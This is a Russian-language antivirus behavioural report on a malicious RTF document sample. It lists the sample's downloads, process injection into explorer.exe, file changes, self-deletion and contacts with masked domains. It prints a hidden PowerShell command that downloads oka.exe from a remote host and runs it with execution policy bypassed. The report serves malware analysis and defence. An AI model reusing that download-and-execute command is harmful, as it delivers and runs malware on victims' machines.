Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://15#.#0.140.23/oka.exe как %appdata%\oka.exe
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- oka.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghgh›.sct
- %APPDATA%\oka.exe
- <Текущая директория>\~wrd0000.tmp
Удаляет следующие файлы
- %APPDATA%\oka.exe
- %TEMP%\abctfhghgdghgh›.sct
Изменяет следующие файлы
Подменяет следующие файлы
- <PATH_SAMPLE>.rtf
Самоудаляется.
Сетевая активность
Подключается к
- '15#.#0.140.23':80
- 'us###ctor.com':80
- 'co##te.club':80
- 'da####babble.com':80
- 'ca#####ealthlabs.net':80
- 'la#####acyfund.co.uk':80
- '69###oad.xyz':80
- '29####ptonave.com':80
- 'zh#####nfinearts.com':80
- 'mo######tirrupsandsage.com':80
- 're#####adtextiles.com':80
- 'ul#####estartups.com':80
TCP
Запросы HTTP GET
- http://www.in####mentpeers.com/w8rr/?SB##################################################################################
UDP
- DNS ASK us###ctor.com
- DNS ASK th###bhendu.com
- DNS ASK co##te.club
- DNS ASK da####babble.com
- DNS ASK se###i119.net
- DNS ASK ca#####ealthlabs.net
- DNS ASK la#####acyfund.co.uk
- DNS ASK in####mentpeers.com
- DNS ASK 69###oad.xyz
- DNS ASK 29####ptonave.com
- DNS ASK zh#####nfinearts.com
- DNS ASK mo######tirrupsandsage.com
- DNS ASK re#####adtextiles.com
- DNS ASK ul#####estartups.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\oka.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://15#.#0.140.23/oka.exe','%APPDATA%\oka.exe');Start-Process '%APPDATA%\o...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\netstat.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%APPDATA%\oka.exe"
